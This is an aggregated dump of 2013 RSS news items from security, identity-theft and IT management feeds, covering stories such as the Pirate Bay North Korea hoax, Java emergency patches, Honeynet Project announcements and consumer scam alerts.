http://www.hackinthebox.org/backend.php https://www.facebook.com/photo.php?fbid=383400901757540&set=a.203123029785329.41372.193763917387907&type=1 The Pirate Bay has admitted that its claim to have relocated its servers to North Korea was a hoax, and then had pop at those who believed the file-sharing site the first time around. TPB surprised many when it claimed in a statement released earlier this week that it had been granted virtual asylum in the secretive Asian state, not least because of the poor internet infrastructure on offer there and the countrys dubious human rights record. Tags: PiratebayIndustry News

==> First C compiler pops up on Github

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/C_%28programming_language%29 If you have a nostalgic turn of mind, there's a new posting over on Github that you'll just love: the earliest known C compiler by the legendary Dennis Ritchie has been published on the repository. It's not new: long before his death in 2011, Ritchie wrote about the effort to find, recover and preserve the early work on C here. Even as far back as 2001, the effort to recover the earliest life of one of the world's most important programming languages was considered computer industry palaeontology. Tags: Software-Programming

==> EBay develops 'miles per gallon' metric for data centers

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/EBay There's a maxim in the data center business that you can't manage what you can't measure, and eBay has come up with the mother of all measurement systems for calculating data center efficiency. The online auction giant has devised a methodology that looks at the cost of its IT operations in dollars, kilowatt hours and carbon emissions, and ties those costs back to a single performance metric -- in eBay's case, the number of buy and sell transactions its customers make at eBay.com. Tags: eBayIndustry News

==> Verizon Reports Illicit Images in Maryland Man's Cloud Storage

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Verizon_Communications Verizon Online notified authorities that a Catholic deacon had stored illegal images of bleep on the ISP's cloud storage service. Police charged a Maryland man on March 1 for allegedly possessing illicit images of bleep, following a tip from his cloud storage provider Verizon, which had detected the images in an online sweep of its service. Tags: PrivacyLaw and Orderverizon

==> The Pirate Bay Moves to North Korea, Gets 'Virtual Asylum'

http://www.hackinthebox.org/backend.php http://torrentfreak.com/images/tpb-korea.png The Pirate Bay says it has been offered virtual asylum in North Korea. The move comes after the Norwegian Pirate Party was forced to stop routing traffic for the infamous BitTorrent site by a local copyright group. We can reveal that we have been invited by the leader of the Republic of Korea, to fight our battles from their network, the Pirate Bay says. A traceroute indeed suggests that The Pirate Bay is now being routed through the dictatorial country. Tags: TPBKoreaIndustry News

==> How Facebook dug deep within Android to fix its mobile app

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2013/03/2013-03-04-17.30.42-300x533.png When Facebook's mobile app began misbehaving on an older version of Android in late 2012, Facebook engineers had to dive deep into Android's code to figure out what was causing the mishap. In a whiteboard session today at Facebook headquarters, mobile engineering director Mike Shaver described how Facebook identified a problem in Android itself, then created a workaround for its own app so users wouldn't have to suffer. Tags: FacebookAndroidSoftware-Programming

==> Google's Red Guide to the Android App Store

http://www.hackinthebox.org/backend.php http://static.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/2/29/1330522756756/android.jpg As part of an industry that owes so much to Steve Jobs, we remember him on this day, the 58th anniversary of his birth, with great sadness but also with gratitude. Of Steve's many achievements, we particularly want to celebrate the Apple App Store, the venerable purveyor of iPhone software. Tags: GoogleAndroid

==> Gang arrested for hacking Dubai exchange companies' accounts

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Dubai The Dubai Police have arrested a cyber crime gang who were able to transfer more than Dh7 million from exchange companies in Dubai, a senior official from Dubai Police said. Major General Khamis Matter Al Mazeina, acting chief of Dubai Police, said on Sunday that a gang of Asians and Africans work with hackers in order to enter different websites and systems of different companies here in Dubai in order to transfer money inside and outside the country. Tags: UAEHackersLaw and Order

==> 61-Year-Old Hacker Convicted in Texas

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Texas The FBI recently announced that Michael Musacchio, 61, of Plano, Texas was found guilty of conspiring to hack into his former employer's computer network. Musacchio was the president of transportation company Exel Transportation Services from 2002 until he left the company in 2004 to form competitior Total Transportation Services along with fellow Exel employees Joseph Roy Brown and John Michael Kelly. Tags: SecurityUSHackerLaw and Order

==> Malaysian and Filipino hackers call for 'ceasefire' after weekend of attacks

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Malaysia Malaysian and Filipino hackers waged a cyber war over the weekend before stopping a little after midnight on Monday. Hackers claiming to be from the Malaysian and Filipino chapters of the hacktivist group Anonymous attacked websites of both countries. Tags: MalaysiaPhilippinesHackersSecurity

==> Oracle issues emergency Java update to patch vulnerabilities

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Java_%28programming_language%29 In response to discovering that hackers were actively exploiting two vulnerabilities in Java running in Web browsers, Oracle has released an emergency patch that it says should deal with the problem. Tags: OracleJavaSecurity

==> Two more big financial firms warn of hacking threat

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Citibank Goldman Sachs and Citigroup have stepped up warnings to shareholders about cyberattacks as the U.S. government has prodded banks and government agencies to bolster defenses. Online and mobile banking give new points of entry that can be used to disrupt operations, the two New York- based firms said last week in annual regulatory filings. The companies said theyre vulnerable to tactics that overload websites to shut off public access, such as assaults that disrupted the nations largest lenders last year. Tags: Security

==> Five features iOS should steal from Android

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2013/03/apple-heart-android.jpg If you've come anywhere near a tech site in the last year or so, you've heard it all before. "iOS is getting stale compared to Android! It needs some new ideas!" Whether that's actually true is up for (heated) debate, but those with an open mind are usually willing to acknowledge that Apple and Google could afford to swap a few ideas when it comes to their mobile OSes. Tags: AndroidiOSGoogleApple

==> Use decoy and deception to mess with hackers

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/scudderslane/1467764261/ Security experts say organisations should use decepetion and decoy data in efforts to kick attackers out of corporate networks. The vendor-based security professionals said attackers spent big money on maintaining a foothold within networks. Tags: HackersSecurity

==> Jailed hacker allowed into IT class, hacks prison computers

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/publik15/3426818985/ They're arguing now about who let it happen, but happen it did, with entertaining consequences. Somehow Nicholas Webber found himself in an IT class while in jail. He's serving five years for creating a site called GhostMarket, which allowed those interested in creating computer viruses, partaking of stolen IDs and enjoying private credit card data to congregate. Tags: HackerSecurityLaw and Order

==> Bug bounties recognised in infosec qualifications

http://www.hackinthebox.org/backend.php https://www.savidtech.com/blog/it-security/security-bug-bounty-hunters-rewarding-users-finding-vulnerabilities/ The International Information Systems Certification Consortium ((ISC)) has recognised the contribution that bug bounties can have in building security professionals' qualifications, accepting Aussie startup Bugcrowd's bounties as a means to fulfill Certified Information Systems Security Professional (CISSP) accreditation requirements. According to Bugcrowd co-founder and CEO Casey Ellis, it is the first time a crowdsourced model has been accepted as a means to recognise a security professionals' abilities. Tags: SecurityIndustry News

==> GSoC 2013 Announced

http://www.honeynet.org/rss.xml Like many other open source organizations, The Honeynet Project's members have been excitedly waiting to hear if Google would be running their Google Summer of Code (GSoC) initiative again this year. Well, the wait the over and GSoC 2013 has officially been announced on Google's Open Source Blog. This is great news!

==> Cuckoo Sandbox 0.5 is out!

http://www.honeynet.org/rss.xml Claudio has just released a new version of Cuckoo Sandbox 0.5. The list of new features is very impressive! Check it out at http://cuckoosandbox.org/2012-12-20-to-the-end-of-the-world.html.

==> Donate to the Honeynet Project

http://www.honeynet.org/rss.xml In many countries, its the time of the year you can make tax deductible donations to support your favorite charity and non-profit organization. Id like to ask you to consider donating to the Honeynet Project this year. The Honeynet Project is a 501c3 non-profit organization (EIN: 36-4460128) that - over the past decade - learned the tools, tactics and motives involved in computer and network attacks, and shared the lessons learned with the public. Along the way, we have authored and published many open-source tools to capture & analyze attacks. If you would like to support the cause, please donate. Happy Holidays to all of you. Christian Seifert CEO, The Honeynet Project

==> UK Chapter Annual Status Report 2011/2012

http://www.honeynet.org/rss.xml The UK Chapter's annual status report for 2011/2012 has been published at http://www.ukhoneynet.org/2012/12/04/uk-honeynet-project-chapter-annual-status-report-for-20112012/.

==> ENISA publishes report on honeypots

http://www.honeynet.org/rss.xml ENISA (The European Network and Information Security Agency) under the leadership of CERT Polska has published report on honeypots. Its a hands-on guide on the various honeypot technologies out there looking at various operational aspects, such as extensibility, reliability, ease of deployment, etc. If you are considering running a honeypot, this is a must read! Check it out at http://www.enisa.europa.eu/media/press-releases/new-report-by-eu-agency-enisa-on-digital-trap-honeypots-to-detect-cyber-attacks. Great job, ENISA!

==> Press Release: 2013 Honeynet Project Workshop

http://www.honeynet.org/rss.xml THE HONEYNET PROJECT Contact: Christian Seifert Phone: +1-206-2651944 1425 Broadway #438 Seattle, WA, 98122 FOR IMMEDIATE RELEASE 9 A.M. GST, November 26th, 2012 2013 HONEYNET PROJECT ANNUAL WORKSHOP 10-12 FEBRUARY 2013 IN DUBAI, UAE DUBAI, 26 NOV 2012: This three-day event features an exceptional collection of international security professionals presenting the latest research tools and findings in malware analysis. The twelfth annual workshop will be held at The Address Dubai Mall Hotel on the 10th through 12th of February, 2013, with sponsorship and support from the UAE Honeynet Project chapter, United Arab Emirates Computer Emergency Response Team (aeCERT), and the Pakistan Honeynet Project chapter. The workshop includes one full day of briefings and two full days of hands-on tutorial trainings. Founded in 1999, The Honeynet Project is a non-profit international research organization dedicated to improving the security of the Internet at no cost to the public. Cyber security is a critical element for any nation working towards technical advancement, said H.E. Mohamed Nasser Al Ghanim, Director General of TRA. I am pleased the TRA and aeCERT are participating in this event; hands-on and knowledge-intensive workshops such as this are invaluable as we work towards reinforcing the nations cyber security. Cyber security is not a one-man job, it is dependent on the proactive collaboration of groups spanning government, industry and academia, said Ahmad Alajail, Security Intelligence & Threat Analyst. This is why initiatives such as Honeynet, which provide a diverse talent base, are greatly complementary to the nations cyber security and to our work at aeCERT. The Honeynet Project is composed of 45 regional chapters and is a diverse, talented, and engaged group of hundreds of volunteer security experts who conduct open, cross disciplinary research and development into the evolving threat landscape. Registration and more information available at: http://dubai2013.honeynet.org or by contacting The Honeynet Project CEO Christian Seifert to request a personal interview at: christian.seifert@honeynet.org. -End-

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines excellent information aggregation service to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These - so called SQL injection attacks - manipulate the underlying database by providing user input that - due to the vulnerability in the web application - is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload which could include all kinds of malicious code. The project is being released as open-source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking. Abstract Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> IC3 Scam Alerts (January 7, 2013)

http://www.ic3.gov/rss/news.xml

==> About the ITRC

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml IMG_4727_Scroller_Web2.jpg

==> Identity Theft #1 Again

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity theft complaints continue to rank number one in the Federal Trade Commission's list of complaints, with a 32% increase over 2011. Of the 369,132 complaints reported in 2012, 46.4% involved issues with government documents or benefits fraud. This represents a drastic spike of nearly 70% over the same types of cases last year. Click here

==> 2013 National Consumer Protection Week

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml ncpw_250x250-button-english_1.jpg National Consumer Protection week is March 3-9, 2013. Go to ncpw.gov to find consumer tips and free materials from government and private organizations. Be an informed consumer; avoid scams and fraud!

==> Fed Ex Undelivered Email Scam

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Consumers are receiving emails that appear to be from Fed Ex notifying the recipient of an "undelivered package" The email then asks the receipient to visit a website. Click Here

==> FTC Warns of a Scam Email

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Federal Trade Commission is warning small businesses that an email with a subject line "NOTIFICATION OF CONSUMER COMPLAINT" is not from the FTC. Click Here

==> New Retail Breach Tied to Global Fraud

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Sam Imandoust, ITRC's legal analyst, addresses recent network hack affecting Arizona-based supermarket chain Bashas' Family of Stores. See article by Tracy Kitten in BankInfoSecurity Click here

==> FraudAvengers.org Newsletter

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml FraudAvengers.org has released theirJanuary newsletter! fraud_avengers.jpg The theme of the newsletter is Medical ID Theft. Click on the image to read the newsletter

==> Eva Velasquez Interviewed on 2013 Top Trends

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC's own Eva Velasquez was interviewed by "BankInfo Security" about ID Theft: 2013 Top Trends. Click Here.

==> Breaches 2013

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of March 5, the ITRC has reported100 breaches for 2013. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> 2013 What's Your Story?

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml wys_2013.png Trend Micro Inc. hasannounced the fourth annual "What's Your Story?" contest, an award-winning, user-generated video contest that gives youth an interactive platform to showcase not just their filmmaking talents, but how they have harnessed the power and connection of the Internet in a positive way through creative storytelling. Click here

==> Top 13 Things Taxpayers Should Know

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS/ITRC Solution 34 - Top 13 Things Every Taxpayer Should Know about Identity Theft - wasprovided to IRS_130px.jpg the ITRC by the IRS Office of Identity Protection. This, along with the newIRS/ITRC Fact Sheet 143, gives the consumer or victim a comprehensive look Click here

==> Social Security Announces New Online Services Available

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml "More than 60 million Social Security beneficiaries and Supplemental Security Income (SSI) recipients can now access their benefit verification letter, payment history, and earnings record instantly using their online account...." Click Here

==> IC3 Most Popular Passwords of 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml regarding the most popular 2012 passwords on the web. The ranking was based on password information from compromised accounts posted by hackers online. Click Here

==> ITRC Welcomes a New President/CEO

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml appointment of Eva Casey Velasquez as its new President/CEO.

==> Pay Day Loan Scams Affecting Emergency Services

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Reports of pay day loan phone scams have been occurring for the last three years or more. The scam involves victims being relentlessly contacted at their residences and places of employment regarding claims they are delinquent on a payday loan. Various coercion techniques have been used by the subjects in an attempt to persuade the victim to send money.... Click Here

==> Stop Think Connect

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml STC_symbol_color_for_scroller.jpg STOP. THINK. CONNECT. is the first-ever coordinated message to help all digital citizens stay safer and more secure online. The message was created by an unprecedented coalition of private companies, nonprofits and government organizations.Click here

==> CFPB Halts Alleged Mortgage Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Consumer Financial Protection Bureauhas announced actions to halt two alleged mortgage loan modification scams it believes ripped-off thousands of struggling homeowners across the country. In total, these operations took in more than $10 million by charging consumers for services that falsely promised to prevent foreclosures or renegotiate troubled mortgages. CLICK TO READ MORE

==> Web Wise Kids Teaches Online Safety

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml teaching kids and parents how to be safe online. Click Here!

==> ITRC Participates in AZ ID Theft Coalition Meeting

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml AZwhen participating in an Arizona Identity Theft Coalition meeting. We want to thank everyone in the Arizona Attorney General's Office who wereinvolved in putting together such a great event!

==> IKeepSafe.org Educates K-12

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml K-12 about being safe and smart online. Click Here.

==> Justice Department Raises Awareness of Disaster Fraud Hotline

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Disaster Fraud (NCDF) remind the public there is a potential for disaster fraud in the aftermath of a natural disaster. Suspected fraudulent activity pertaining to relief efforts should be reported to the NCDF hotline at 866-720-5721. The hotline is staffed by a live operator 24/7, for the purpose of reporting suspected scams being perpetrated by criminals in the aftermath of disasters.Click Here for More Information

==> IRS Says beware of fraudulent look alike Websites

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml "IRS spokesman David Tucker said a scam involving look-alike websites is making the rounds, seeking identity theft victims."The new tax scam uses a website that mimics the IRS e-Services online registration page," he said. "The actual IRS e-Services page offers web-based products to tax preparers, not the general public. The phony web page looks almost identical to the real one." Read More at the Times Herald Online

==> Stay Safe Online: Protecting Your Data and Electronic Devices During a Natural Disaster

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml an emergency communications plan? Is your data backed up? Do you a have family emergency plan? Ready.gov has several resources to help individuals learn what to do before, during, and after a natural disaster. CLICK HERE TO READ MORE

==> IC3 Scam Alert: Pay Day Loan Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml loan scams over the last three years and continues to see new variations of the scam. The scam involves victims who are relentlessly contacted, via the telephone...Click here for more

==> FBI Fraud Alert

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Banks Warned of Cyber Threat by FBI The Federal Bureau of Investigation, the Financial Services Information Sharing and Analysis Center, and the Internet Crime Complaint Center have jointly issued a Fraud Alert to financial institutions warning them of alarming trends in unauthorized wire transfers overseas in amounts ranging from $400,000 to $900,000. The Fraud Alert explains ... read more

==> Public Wifi Survey Whitepaper Released

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity Theft and Public WiFi Linked in Consumer Minds The ITRC has just published a whitepaper containing the results of its Public WiFi Usage Survey, which aimed to measure the level of knowledge and usage of public WiFi. Click here for more information.

==> Breaches 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As ofDecember26, the ITRC has reported447 breaches for 2012. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> FBI Warns of Mobile Malware Risks

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml BankInfoSecurity_1.JPG The FBI has alerted consumers about two Trojans that have compromised mobile devices running the Android operating system. But are all mobile devices at risk? Click here for full article

==> ITRC Monthly Case Load

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Fingerprint_Face_100pix.jpg December2012 ITRC Victim and Consumer Contacts: 577 Total 2012 ytdContacts:9,183

==> Dangerous Side of Online Romance Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IC3 is warning the public to be wary of romance scams in which scammers target Ic3_sm.jpg individuals who search for companionship or romance online. Someone you know may be "dating" someone online who may appear to be decent and honest. However, be forewarned...Clickimage for more.

==> IRS Unveils ID Theft Program

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS has implemented a new pilot program designed to aid law enforcement in obtaining tax return data to help investigate and prosecute specific cases of identity theft. This program is currently limited to coordinated efforts within the state of Florida. How it works: State and local law enforcement officials with evidence of identity theft involving fraudulently filed federal tax returns will have the victims complete a special IRS disclosure form - Click here for more

==> ITRaC News

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml ITRaC News is the ITRC quarterly e-newsletter. This newsletter covers: What's New, latest scams, news releases, product information, Guest Authors, various articles about identity theft, legislative updates and more. Click here for 2012 Q4

==> Check Fraud Still a Problem

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml So much attention has been paid to emerging banking technology, but it is still important to banks to pay attention to check fraud. bis-logo_1.gif BankInfoSecurity.com tells us that check fraud remains one of the top threats in their Faces Fraud survey 2012. Click on the image to read the whole story.

==> California AG Launches New Privacy Enforcement and Protection Unit

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml California Attorney General, Kamala D. Harris, has announced the creation of the Privacy Enforcement and Protection Unit. MP900403716_1.JPG The organization will focus on protecting consumer and individual privacy through civil prosecution of state and federal privacy laws. For more information, read CALPIRG's most recent blog on the matter by clicking on the image.

==> My Free ChildScan

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A bleep is an easy target for identity thieves because the crime can go undetected for years. Now parents have a safe and secure way to determine Child_Scan_20110719.JPG if someone is using their childs Social Security number. Click on image

==> 10 Ways To Foster Effective Social Employees

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Social business tools can be used effectively, or they can be a huge time sink.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> H-1B Workers Not Best Or Brightest, Study Says

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Skilled foreign worker programs are causing a U.S. brain drain, an Economic Policy Institute report says.

==> CIO Profiles: Keith J. Figlioli Of Premier

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Don't waste this healthcare alliance CIO's time with overhyped marketing promises.

==> U.K. Nonprofit Seeks Tech Ideas To Help Teens

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Tech for Good challenge will invest $758,000 in projects that use "disruptive digital technology" to create new opportunities for at-risk young adults in the U.K.

==> Could A MOOC Ease Your Talent Problems?

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Boston's EdX partnership with MIT should spur CIOs to consider creating their own massive open online courses to fill skills gaps.

==> Code.org Urges Students To Embrace Programming

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN After tech industry hiring practices left students reluctant to go into software engineering, the industry wants to make up.

==> Cisco CEO: We're All In On Internet Of Everything

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CEO John Chambers touts Internet of Everything as cornerstone of Cisco's strategy, urges business leaders to join push toward open standards and cross-industry collaboration.

==> Federal CIO Q&A: Security, Sequestration And More

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Biggest challenge in realizing agile, efficient government IT continues to be the required cultural change, says Federal CIO Steve VanRoekel.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> U.K., India Sign Cybersecurity Pact

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Government and law enforcement agencies will collaborate to protect U.K. data held by Indian outsourcers and cloud vendors.

==> IT Security Understaffing Worries CISOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN More than two-thirds of execs say current staffing levels pose risks to company safety, according to new study.

==> LinkedIn Endorsements: Do's And Don'ts

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Love them or hate them, you can't just ignore LinkedIn Endorsements. Here's expert advice on how to deal with social's new head-scratcher.

==> HP CEO Dismisses Break-Up Talk

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN While sharing dismal Q1 results, HP CEO Meg Whitman says HP will not sell its enterprise services or PC unit; projects return to growth in 2014.

==> Healthcare CIOs Juggle Obamacare, Traditional Projects

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Newly empowered healthcare CIOs struggle to find their way in regulatory landscape while defending budgets, says Deloitte report.

==> Big Data Myths Persist

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big data hype has reached a level where some customers are actually avoiding labeling projects as big data, Tibco executives say.

==> 4 Big BYOD Trends For 2013

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Interop Las Vegas speaker Michael Finneran and other BYOD experts discuss key trends enterprise IT leaders should watch in 2013.

==> LinkedIn Jobs Gets A Search Boost

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN LinkedIn's makeover continues, but is the platform moving in the right direction?

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Accenture: Seven Key Tech Trends For Business

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Accenture survey suggests practical ways to get your organization on a path to digital success.

==> U.K. CIO Salaries Strong Despite Recession, Study Says

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN British IT leaders are more than holding their own when it comes to professional compensation.

==> Google, Amazon May Face New Hurdle In U.K.

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Will Google, Amazon and other U.S. IT companies be shut out of U.K. government contracts after bragging about tax avoidance?

==> CIO Profiles: Ken Harris of Shaklee

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hands-on attention from higher-ups key to IT project success, says CIO for natural nutrition company Shaklee.

==> 7 Moves Dell Must Make Now

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Dell's decision to go private was a bold step, but the company must continue making aggressive decisions to succeed.

==> Even Grandmothers Can Be Online Trolls

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.K. company Saga shutters its social media site for seniors after online trolls produce a stream of abuse and mayhem.

==> U.K. IT Employment Paradox Raises Questions

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.K. is adding jobs at a fast clip, despite its overall economic sluggishness. Why, then, are IT hiring numbers so unimpressive?

==> U.K. Students Not Lining Up To Study IT

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New figures show sharp decline in the number of British teenagers taking up IT as a subject. The government says it has a solution, but will it come too late?

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> White House Seeks Tech Innovation Fellows

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Program recruits innovators and entrepreneurs to work on "high impact" federal IT projects during six- to 12-month tours of duty.

==> White House Cybersecurity Czar: Executive Order A 'Down Payment'

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Michael Daniel says President Obama's Executive Order on Cybersecurity sets the stage for cybersecurity legislation for protecting critical infrastructure. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Ponemon Rates State Of Cloud Security

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ponemon research shows Incremental improvements in risk assessments and data protection in the cloud, trouble with access control issues. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Bank Attackers Restart Operation Ababil DDoS Disruptions

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Some customers report difficulty accessing banking sites, but officials said DDoS defenses and service provider blocks may be partly to blame. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Government Google Data Requests: Scope Unclear

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google has begun disclosing limited information about U.S. government investigations that demand consumer data and, usually, silence from those cooperating. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Java Emergency Patch Slaps McRAT Infections

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Oracle patches two more zero-day bugs in Java 6 and Java 7. But security researcher spots new vulnerabilities in Java 7. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Evernote: We're Adding Two-Factor Authentication

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN After data breach and wide password reset, Evernote accelerates plans to offer additional security to users. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> What Unlocked Phones Mean For Businesses

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.S. lawmakers pledge to change regulations that make it illegal to unlock cell phones. Is there an upside for the enterprise? Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

